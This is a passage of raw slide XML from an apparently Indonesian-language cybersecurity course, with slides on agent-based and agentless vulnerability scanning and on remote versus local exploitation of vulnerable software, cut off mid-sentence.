              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diimplementasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>agen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Agen </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berjalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemindaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diinstal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melaporkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alternatif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>produk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>agen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memindai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memerlukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>instalasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>apa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pun. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pemindaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>agen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemungkinan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengintaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>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23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2718435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Vektor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Jaringan</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rentan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kesempatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjalankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbahaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>suatu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjalankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>eksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memicu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Teknik </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>eksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertentu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diklasifikasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Remote</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berarti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dieksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengirimkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> target </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bergantung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diautentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dieksekusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Lokal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berarti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>eksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dieksekusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diautentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kredensial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang valid </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membajak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sudah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
